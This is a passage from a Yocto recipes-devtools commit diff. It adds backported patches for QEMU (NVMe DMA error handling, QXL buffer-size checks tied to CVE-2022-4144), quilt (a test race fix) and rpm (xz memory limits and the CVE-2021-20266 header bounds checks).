+ trace_nvme_err_invalid_prp();
+@@ -178,7 +179,11 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ ret = nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp2);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ while (len != 0) {
+ uint64_t prp_ent = le64_to_cpu(prp_list[i]);
+
+@@ -191,8 +196,12 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ i = 0;
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp_ent, (void *)prp_list,
+- prp_trans);
++ ret = nvme_addr_read(n, prp_ent, (void *)prp_list,
++ prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp_ent);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ prp_ent = le64_to_cpu(prp_list[i]);
+ }
+
+@@ -286,6 +295,7 @@ static void nvme_post_cqes(void *opaque)
+ NvmeCQueue *cq = opaque;
+ NvmeCtrl *n = cq->ctrl;
+ NvmeRequest *req, *next;
++ int ret;
+
+ QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
+ NvmeSQueue *sq;
+@@ -295,15 +305,21 @@ static void nvme_post_cqes(void *opaque)
+ break;
+ }
+
+- QTAILQ_REMOVE(&cq->req_list, req, entry);
+ sq = req->sq;
+ req->cqe.status = cpu_to_le16((req->status << 1) | cq->phase);
+ req->cqe.sq_id = cpu_to_le16(sq->sqid);
+ req->cqe.sq_head = cpu_to_le16(sq->head);
+ addr = cq->dma_addr + cq->tail * n->cqe_size;
++ ret = pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
++ sizeof(req->cqe));
++ if (ret) {
++ trace_pci_nvme_err_addr_write(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
++ QTAILQ_REMOVE(&cq->req_list, req, entry);
+ nvme_inc_cq_tail(cq);
+- pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
+- sizeof(req->cqe));
+ QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
+ }
+ if (cq->tail != cq->head) {
+@@ -888,7 +904,12 @@ static void nvme_process_sq(void *opaque)
+
+ while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
+ addr = sq->dma_addr + sq->head * n->sqe_size;
+- nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
++ if (nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd))) {
++ trace_pci_nvme_err_addr_read(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
+ nvme_inc_sq_head(sq);
+
+ req = QTAILQ_FIRST(&sq->req_list);
+diff --git a/hw/block/trace-events b/hw/block/trace-events
+index c03e80c..4e4ad4e 100644
+--- a/hw/block/trace-events
++++ b/hw/block/trace-events
+@@ -60,6 +60,9 @@ nvme_mmio_shutdown_set(void) "shutdown bit set"
+ nvme_mmio_shutdown_cleared(void) "shutdown bit cleared"
+
+ # nvme traces for error conditions
++pci_nvme_err_addr_read(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_addr_write(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_cfs(void) "controller fatal status"
+ nvme_err_invalid_dma(void) "PRP/SGL is too small for transfer size"
+ nvme_err_invalid_prplist_ent(uint64_t prplist) "PRP list entry is null or not page aligned: 0x%"PRIx64""
+ nvme_err_invalid_prp2_align(uint64_t prp2) "PRP2 is not page aligned: 0x%"PRIx64""
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
new file mode 100644
index 0000000000..66ada52efb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
@@ -0,0 +1,55 @@
+From 55428706d5b0b8889b8e009eac77137bb556a4f0 Mon Sep 17 00:00:00 2001
+From: Klaus Jensen <k.jensen@samsung.com>
+Date: Tue, 9 Jun 2020 21:03:17 +0200
+Subject: [PATCH 1/2] hw/block/nvme: refactor nvme_addr_read
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Pull the controller memory buffer check to its own function. The check
+will be used on its own in later patches.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Maxim Levitsky <mlevitsk@redhat.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Message-Id: <20200609190333.59390-7-its@irrelevant.dk>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+---
+ hw/block/nvme.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index 12d8254..e6f24a6 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -52,14 +52,22 @@
+
+ static void nvme_process_sq(void *opaque);
+
++static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr low = n->ctrl_mem.addr;
++ hwaddr hi = n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size);
++
++ return addr >= low && addr < hi;
++}
++
+ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+- if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+- addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
++ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- } else {
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return;
+ }
++
++ pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
new file mode 100644
index 0000000000..f380be486c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
@@ -0,0 +1,236 @@
+From 5a44a01c9eca6507be45d107c27377a3e8d0ee8c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:39 +0100
+Subject: [PATCH] hw/display/qxl: Pass requested buffer size to qxl_phys2virt()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Currently qxl_phys2virt() doesn't check for buffer overrun.
+In order to do so in the next commit, pass the buffer size
+as argument.
+
+For QXLCursor in qxl_render_cursor() -> qxl_cursor() we
+verify the size of the chunked data ahead, checking we can
+access 'sizeof(QXLCursor) + chunk->data_size' bytes.
+Since in the SPICE_CURSOR_TYPE_MONO case the cursor is
+assumed to fit in one chunk, no change are required.
+In SPICE_CURSOR_TYPE_ALPHA the ahead read is handled in
+qxl_unpack_chunks().
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Acked-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-4-philmd@linaro.org>
+
+Backport and rebase patch to fix compile error which imported by CVE-2022-4144.patch:
+
+/qxl.c: In function 'qxl_phys2virt':
+| /home/hitendra/work/yocto-work/cgx-data/dunfell-3.1/x86-generic-64-5.4-3.1-cgx/project/tmp/work/i586-montavistamllib32-linux/lib32-qemu/4.2.0-r0.8/qemu-4.2.0/hw/display/qxl.c:1508:67: error: 'size' undeclared (first use in this function); did you mean 'gsize'?
+| 1508 | if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+| | ^~~~
+| | gsize
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/61c34fc && https://gitlab.com/qemu-project/qemu/-/commit/8efec0ef8bbc1e75a7ebf6e325a35806ece9b39f]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl-logger.c | 22 +++++++++++++++++++---
+ hw/display/qxl-render.c | 20 ++++++++++++++++----
+ hw/display/qxl.c | 17 +++++++++++------
+ hw/display/qxl.h | 3 ++-
+ 4 files changed, 48 insertions(+), 14 deletions(-)
+
+diff --git a/hw/display/qxl-logger.c b/hw/display/qxl-logger.c
+index 2ec6d8fa..031ddfec 100644
+--- a/hw/display/qxl-logger.c
++++ b/hw/display/qxl-logger.c
+@@ -106,7 +106,7 @@ static int qxl_log_image(PCIQXLDevice *qxl, QXLPHYSICAL addr, int group_id)
+ QXLImage *image;
+ QXLImageDescriptor *desc;
+
+- image = qxl_phys2virt(qxl, addr, group_id);
++ image = qxl_phys2virt(qxl, addr, group_id, sizeof(QXLImage));
+ if (!image) {
+ return 1;
+ }
+@@ -216,7 +216,8 @@ int qxl_log_cmd_cursor(PCIQXLDevice *qxl, QXLCursorCmd *cmd, int group_id)
+ cmd->u.set.position.y,
+ cmd->u.set.visible ? "yes" : "no",
+ cmd->u.set.shape);
+- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id);
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id,
++ sizeof(QXLCursor));
+ if (!cursor) {
+ return 1;
+ }
+@@ -238,6 +239,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ {
+ bool compat = ext->flags & QXL_COMMAND_FLAG_COMPAT;
+ void *data;
++ size_t datasz;
+ int ret;
+
+ if (!qxl->cmdlog) {
+@@ -249,7 +251,20 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ qxl_name(qxl_type, ext->cmd.type),
+ compat ? "(compat)" : "");
+
+- data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ switch (ext->cmd.type) {
++ case QXL_CMD_DRAW:
++ datasz = compat ? sizeof(QXLCompatDrawable) : sizeof(QXLDrawable);
++ break;
++ case QXL_CMD_SURFACE:
++ datasz = sizeof(QXLSurfaceCmd);
++ break;
++ case QXL_CMD_CURSOR:
++ datasz = sizeof(QXLCursorCmd);
++ break;
++ default:
++ goto out;
++ }
++ data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id, datasz);
+ if (!data) {
+ return 1;
+ }
+@@ -271,6 +286,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ qxl_log_cmd_cursor(qxl, data, ext->group_id);
+ break;
+ }
++out:
+ fprintf(stderr, "\n");
+ return 0;
+ }
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d532e157..a65a6d64 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -107,7 +107,9 @@ static void qxl_render_update_area_unlocked(PCIQXLDevice *qxl)
+ qxl->guest_primary.resized = 0;
+ qxl->guest_primary.data = qxl_phys2virt(qxl,
+ qxl->guest_primary.surface.mem,
+- MEMSLOT_GROUP_GUEST);
++ MEMSLOT_GROUP_GUEST,
++ qxl->guest_primary.abs_stride
++ * height);
+ if (!qxl->guest_primary.data) {
+ return;
+ }
+@@ -222,7 +224,8 @@ static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
+ if (offset == size) {
+ return;
+ }
+- chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
++ chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id,
++ sizeof(QXLDataChunk) + chunk->data_size);
+ if (!chunk) {
+ return;
+ }
+@@ -289,7 +292,8 @@ fail:
+ /* called from spice server thread context only */
+ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ {
+- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCursorCmd));
+ QXLCursor *cursor;
+ QEMUCursor *c;
+
+@@ -308,7 +312,15 @@ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ }
+ switch (cmd->type) {
+ case QXL_CURSOR_SET:
+- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id);
++ /* First read the QXLCursor to get QXLDataChunk::data_size ... */
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++ sizeof(QXLCursor));
++ if (!cursor) {
++ return 1;
++ }
++ /* Then read including the chunked data following QXLCursor. */
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++ sizeof(QXLCursor) + cursor->chunk.data_size);
+ if (!cursor) {
+ return 1;
+ }
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index 6bc8385b..858d3e93 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -275,7 +275,8 @@ static void qxl_spice_monitors_config_async(PCIQXLDevice *qxl, int replay)
+ QXL_IO_MONITORS_CONFIG_ASYNC));
+ }
+
+- cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST);
++ cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST,
++ sizeof(QXLMonitorsConfig));
+ if (cfg != NULL && cfg->count == 1) {
+ qxl->guest_primary.resized = 1;
+ qxl->guest_head0_width = cfg->heads[0].width;
+@@ -460,7 +461,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+ switch (le32_to_cpu(ext->cmd.type)) {
+ case QXL_CMD_SURFACE:
+ {
+- QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLSurfaceCmd));
+
+ if (!cmd) {
+ return 1;
+@@ -494,7 +496,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+ }
+ case QXL_CMD_CURSOR:
+ {
+- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCursorCmd));
+
+ if (!cmd) {
+ return 1;
+@@ -674,7 +677,8 @@ static int interface_get_command(QXLInstance *sin, struct QXLCommandExt *ext)
+ *
+ * https://cgit.freedesktop.org/spice/win32/qxl-wddm-dod/commit/?id=f6e099db39e7d0787f294d5fd0dce328b5210faa
+ */
+- void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCommandRing));
+ if (msg != NULL && (
+ msg < (void *)qxl->vga.vram_ptr ||
+ msg > ((void *)qxl->vga.vram_ptr + qxl->vga.vram_size))) {
+@@ -1494,7 +1498,8 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ }
+
+ /* can be also called from spice server thread context */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id,
++ size_t size)
+ {
+ uint64_t offset;
+ uint32_t slot;
+@@ -1994,7 +1999,7 @@ static void qxl_dirty_surfaces(PCIQXLDevice *qxl)
+ }
+
+ cmd = qxl_phys2virt(qxl, qxl->guest_surfaces.cmds[i],
+- MEMSLOT_GROUP_GUEST);
++ MEMSLOT_GROUP_GUEST, sizeof(QXLSurfaceCmd));
+ assert(cmd);
+ assert(cmd->type == QXL_SURFACE_CMD_CREATE);
+ qxl_dirty_one_surface(qxl, cmd->u.surface_create.data,
+diff --git a/hw/display/qxl.h b/hw/display/qxl.h
+index 80eb0d26..fcfd133a 100644
+--- a/hw/display/qxl.h
++++ b/hw/display/qxl.h
+@@ -147,7 +147,8 @@ typedef struct PCIQXLDevice {
+ #define QXL_DEFAULT_REVISION QXL_REVISION_STABLE_V12
+
+ /* qxl.c */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id);
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id,
++ size_t size);
+ void qxl_set_guest_bug(PCIQXLDevice *qxl, const char *msg, ...)
+ GCC_FMT_ATTR(2, 3);
+
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu_4.2.0.bb b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
index 9c76144749..05449afe4e 100644
--- a/meta/recipes-devtools/qemu/qemu_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
@@ -24,7 +24,8 @@ do_install_append_class-nativesdk() {
}
PACKAGECONFIG ??= " \
- fdt sdl kvm \
+ fdt sdl kvm slirp \
${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \
+ ${@bb.utils.filter('DISTRO_FEATURES', 'seccomp', d)} \
"
-PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm"
+PACKAGECONFIG:class-nativesdk ??= "fdt sdl kvm slirp"
diff --git a/meta/recipes-devtools/quilt/quilt.inc b/meta/recipes-devtools/quilt/quilt.inc
index d6d06c049c..ad23b8d922 100644
--- a/meta/recipes-devtools/quilt/quilt.inc
+++ b/meta/recipes-devtools/quilt/quilt.inc
@@ -12,6 +12,7 @@ SRC_URI = "${SAVANNAH_GNU_MIRROR}/quilt/quilt-${PV}.tar.gz \
file://Makefile \
file://test.sh \
file://0001-tests-Allow-different-output-from-mv.patch \
+ file://faildiff-order.patch \
"
SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch"
@@ -30,7 +31,7 @@ EXTRA_OECONF = "--with-perl='${USRBINPATH}/env perl' --with-patch=patch"
EXTRA_OECONF_append_class-native = " --disable-nls"
EXTRA_AUTORECONF += "--exclude=aclocal"
-CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash"
+CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash ac_cv_path_COLUMN=column"
# Make sure we don't have "-w" in shebang lines: it breaks using
# "/usr/bin/env perl" as parser
diff --git a/meta/recipes-devtools/quilt/quilt/faildiff-order.patch b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
new file mode 100644
index 0000000000..f22065a250
--- /dev/null
+++ b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
@@ -0,0 +1,41 @@
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 4dfe7f9e702c85243a71e4de267a13e434b6d6c2 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Fri, 20 Jan 2023 12:56:08 +0100
+Subject: [PATCH] test: Fix a race condition
+
+The test suite does not differentiate between stdout and stderr. When
+messages are printed to both, the order in which they will reach us
+is apparently not guaranteed. Ideally this would be deterministic, but
+until then, explicitly test stdout and stderr separately in the test
+case itself. Otherwise the test suite fails randomly, which is a pain
+for distribution package maintainers.
+
+This fixes bug #63651 reported by Ross Burton:
+https://savannah.nongnu.org/bugs/index.php?63651
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+---
+ test/faildiff.test | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/test/faildiff.test b/test/faildiff.test
+index 5afb8e3..0444c15 100644
+--- a/test/faildiff.test
++++ b/test/faildiff.test
+@@ -27,8 +27,9 @@ What happens on binary files?
+ > File test.bin added to patch %{P}test.diff
+
+ $ printf "\\003\\000\\001" > test.bin
+- $ quilt diff -pab --no-index
++ $ quilt diff -pab --no-index 2>/dev/null
+ >~ (Files|Binary files) a/test\.bin and b/test\.bin differ
++ $ quilt diff -pab --no-index >/dev/null
+ > Diff failed on file 'test.bin', aborting
+ $ echo %{?}
+ > 1
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
index 6454785254..dc3f74fecd 100644
--- a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
+++ b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
@@ -11,36 +11,39 @@ CPU thread.
Upstream-Status: Pending [merge of multithreading patches to upstream]
Signed-off-by: Peter Bergin <peter@berginkonsult.se>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
---
- rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
+ rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 36 insertions(+)
diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
index e051c98..b3c56b6 100644
--- a/rpmio/rpmio.c
+++ b/rpmio/rpmio.c
-@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
}
#endif
-+ struct rlimit virtual_memory;
-+ getrlimit(RLIMIT_AS, &virtual_memory);
-+ if (virtual_memory.rlim_cur != RLIM_INFINITY) {
++ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY};
++ int status = getrlimit(RLIMIT_AS, &virtual_memory);
++ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) {
+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur;
++ uint32_t threads_max = lzma_cputhreads();
+ const uint64_t virtual_memlimit_per_cpu_thread =
-+ virtual_memlimit / lzma_cputhreads();
-+ uint64_t memory_usage_virt;
++ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max);
+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and "
+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread);
++ uint64_t memory_usage_virt;
+ /* keep reducing the number of compression threads until memory
+ usage falls below the limit per CPU thread*/
+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) >
+ virtual_memlimit_per_cpu_thread) {
-+ /* If number of threads goes down to zero lzma_stream_encoder will
-+ * will return UINT64_MAX. We must check here to avoid an infinite loop.
++ /* If number of threads goes down to zero or in case of any other error
++ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check
++ * for both the cases here to avoid an infinite loop.
+ * If we get into situation that one thread requires more virtual memory
+ * than available we set one thread, print error message and try anyway. */
-+ if (--mt_options.threads == 0) {
++ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) {
+ mt_options.threads = 1;
+ rpmlog(RPMLOG_WARNING,
+ "XZ: Could not adjust number of threads to get below "
diff --git a/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
new file mode 100644
index 0000000000..9a5ebb9115
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
@@ -0,0 +1,34 @@
+From 405fc8998181353bd510864ca251dc233afec276 Mon Sep 17 00:00:00 2001
+From: Vitaly Chikunov <vt@altlinux.org>
+Date: Wed, 6 Jan 2021 23:43:41 +0300
+Subject: [PATCH] rpmio: Fix lzopen_internal mode parsing when 'Tn' is used
+
+When there is number after "T" (suggested number of threads or "0" for
+getncpus), lzopen_internal() mode parser would skip one byte, and when
+it's at the end of the string it would then parse undesired garbage from
+the memory, making intermittent compression failures.
+
+Fixes: 7740d1098 ("Add support for multithreaded xz compression")
+Signed-off-by: Vitaly Chikunov <vt@altlinux.org>
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/405fc8998181353bd510864ca251dc233afec276]
+
+---
+ rpmio/rpmio.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
+index ed1e25140..9d32ec6d9 100644
+--- a/rpmio/rpmio.c
++++ b/rpmio/rpmio.c
+@@ -798,6 +798,7 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+ * should've processed
+ * */
+ while (isdigit(*++mode));
++ --mode;
+ }
+ #ifdef HAVE_LZMA_MT
+ else
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
new file mode 100644
index 0000000000..f2fc47e321
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@
+From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <athena@invisiblethingslab.com>
+Date: Mon, 8 Feb 2021 16:05:01 -0500
+Subject: [PATCH] hdrblobInit() needs bounds checks too
+
+Users can pass untrusted data to hdrblobInit() and it must be robust
+against this.
+
+Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15]
+CVE: CVE-2021-20266
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ lib/header.c | 48 +++++++++++++++++++++++++++++++-----------------
+ 1 file changed, 31 insertions(+), 17 deletions(-)
+
+diff --git a/lib/header.c b/lib/header.c
+index 5b09f8352..ad5b6dc57 100644
+--- a/lib/header.c
++++ b/lib/header.c
+@@ -11,6 +11,7 @@
+ #include "system.h"
+ #include <netdb.h>
+ #include <errno.h>
++#include <inttypes.h>
+ #include <rpm/rpmtypes.h>
+ #include <rpm/rpmstring.h>
+ #include "lib/header_internal.h"
+@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob)
+ return NULL;
+ }
+
++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl,
++ char **emsg) {
++ uint32_t il_max = HEADER_TAGS_MAX;
++ uint32_t dl_max = HEADER_DATA_MAX;
++ if (regionTag == RPMTAG_HEADERSIGNATURES) {
++ il_max = 32;
++ dl_max = 8192;
++ }
++ if (hdrchkRange(il_max, il)) {
++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il);
++ return RPMRC_FAIL;
++ }
++ if (hdrchkRange(dl_max, dl)) {
++ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl);
++ return RPMRC_FAIL;
++ }
++ return RPMRC_OK;
++}
++
+ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg)
+ {
+ int32_t block[4];
+@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ size_t nb;
+ rpmRC rc = RPMRC_FAIL; /* assume failure */
+ int xx;
+- int32_t il_max = HEADER_TAGS_MAX;
+- int32_t dl_max = HEADER_DATA_MAX;
+-
+- if (regionTag == RPMTAG_HEADERSIGNATURES) {
+- il_max = 32;
+- dl_max = 8192;
+- }
+
+ memset(block, 0, sizeof(block));
+ if ((xx = Freadall(fd, bs, blen)) != blen) {
+@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ goto exit;
+ }
+ il = ntohl(block[2]);
+- if (hdrchkRange(il_max, il)) {
+- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il);
+- goto exit;
+- }
+ dl = ntohl(block[3]);
+- if (hdrchkRange(dl_max, dl)) {
+- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl);
++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg))
+ goto exit;
+- }
+
+ nb = (il * sizeof(struct entryInfo_s)) + dl;
+ uc = sizeof(il) + sizeof(dl) + nb;
+@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc,
+ struct hdrblob_s *blob, char **emsg)
+ {
+ rpmRC rc = RPMRC_FAIL;
+-
+ memset(blob, 0, sizeof(*blob));
++ if (uc && uc < 8) {
++ rasprintf(emsg, _("hdr length: BAD"));
++ goto exit;
++ }
++
+ blob->ei = (int32_t *) uh; /* discards const */
+- blob->il = ntohl(blob->ei[0]);
+- blob->dl = ntohl(blob->ei[1]);
++ blob->il = ntohl((uint32_t)(blob->ei[0]));
++ blob->dl = ntohl((uint32_t)(blob->ei[1]));
++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK)
++ goto exit;
++
